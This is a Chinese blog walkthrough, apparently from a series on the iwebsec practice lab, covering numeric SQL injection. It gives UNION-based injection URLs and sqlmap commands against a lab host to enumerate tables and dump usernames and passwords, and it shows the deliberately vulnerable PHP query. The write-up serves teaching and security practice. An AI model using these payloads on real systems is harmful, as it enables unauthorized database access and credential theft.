iwebsec-sql注入 01 数字型注入

合集 - iwebsec(34)

1.iwebsec-sql注入 01 数字型注入2023-08-18

2.iwebsec-sql注入 02 字符型注入2023-08-183.iwebsec-sql注入 03 bool型注入2023-08-184.iwebsec-sql注入 04 时间延迟型注入2023-08-185.iwebsec-sql注入 05 报错型注入2023-08-186.iwebsec-sql注入 06 宽字节字符型注入2023-08-187.iwebsec-sql注入 07 空格过滤2023-08-188.iwebsec-sql注入 08 大小写过滤注入2023-08-189.iwebsec-sql注入 09 双写关键字绕过2023-08-1810.iwebsec-sql注入 10 双重url编码绕过2023-08-1811.iwebsec-sql注入 11 十六进制编码绕过2023-08-1812.iwebsec-sql注入 12 等价函数替换过滤2023-08-1813.iwebsec-sql注入 13 二次注入2023-08-1914.iwebsec-文件上传 01 前端JS过滤绕过2023-08-1915.iwebsec-文件上传 02 文件名过滤绕过2023-08-1916.iwebsec-文件上传 03 Content-Type过滤绕过2023-08-1917.iwebsec-文件上传 04 文件头过滤绕过2023-08-1918.iwebsec-文件上传 05 .htaccess2023-08-1919.iwebsec-文件上传 06 文件截断上传2023-08-1920.iwebsec-文件上传 07 条件竞争2023-08-1921.iwebsec-文件包含 01 本地文件包含2023-08-2022.iwebsec-文件包含 02 本地文件包含绕过2023-08-2023.iwebsec-文件包含 03 session本地文件包含2023-08-2024.iwebsec-文件包含 04 文件头过滤绕过2023-08-2025.iwebsec-文件包含 05 远程文件包含绕过2023-08-2026.iwebsec-文件包含 06 php://filter伪协议2023-08-2027.iwebsec-文件包含 07 php://input伪协议2023-08-2028.iwebsec-文件包含 08 php://input伪协议利用2023-08-2029.iwebsec-文件包含 09 file://伪协议利用2023-08-2030.iwebsec-文件包含 10 data://伪协议利用2023-08-2031.iwebsec-xss 01 反射型xss2023-08-2132.iwebsec-xss 02 存储型xss2023-08-2133.iwebsec-xss 03 DOM型xss2023-08-2134.iwebsec-xss 04 xss修复示例2023-08-21

收起

01、题目分析

数字型注入的sql语句

select * from news where id=$id;

最最最常规的，直接注入

02、手工注入：

先判断有多少列

http://www.bdrwmy.cn:8001/sqli/01.php?id=1 order by 3
-- id=-1就是不显示内容
http://www.bdrwmy.cn:8001/sqli/01.php?id=-1 union select 1,2,3

知道有多少列了，接下来判断数据库

http://www.bdrwmy.cn:8001/sqli/01.php?id=-1 union select 1,2,database()

知道数据库名称了，接下来就可以爆表

http://www.bdrwmy.cn:8001/sqli/01.php?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='iwebsec'

爆列

http://www.bdrwmy.cn:8001/sqli/01.php?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='sqli'

爆数据

http://www.bdrwmy.cn:8001/sqli/01.php?id=-1 union select 1,2,group_concat(concat_ws('~',username,password)) from iwebsec.sqli

收工

03、sqlmap工具注入：

判断能否注入：

 python .\sqlmap.py -u "http://www.bdrwmy.cn:8001/sqli/01.php?id=1"

能注入，暴库

 python .\sqlmap.py -u "http://www.bdrwmy.cn:8001/sqli/01.php?id=1"  --dbs

暴表

python .\sqlmap.py -u "http://www.bdrwmy.cn:8001/sqli/01.php?id=1"  --tables  -D iwebsec

暴字段

python .\sqlmap.py -u "http://www.bdrwmy.cn:8001/sqli/01.php?id=1"  -T sqli  -D iwebsec  --columns

暴数据

python .\sqlmap.py -u "http://www.bdrwmy.cn:8001/sqli/01.php?id=1"  -T sqli  -D iwebsec  -C "username,password" --dump

04、代码分析

<?php
  if(isset($_GET['id'])){
    $id=$_GET['id'];
	
	$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
    # 这就是最简单的sql语句拼接，输入值会进入到id中，因此可以实现sql注入
		$result=mysql_query($sql);
	}
  else{
	exit();
  }
?>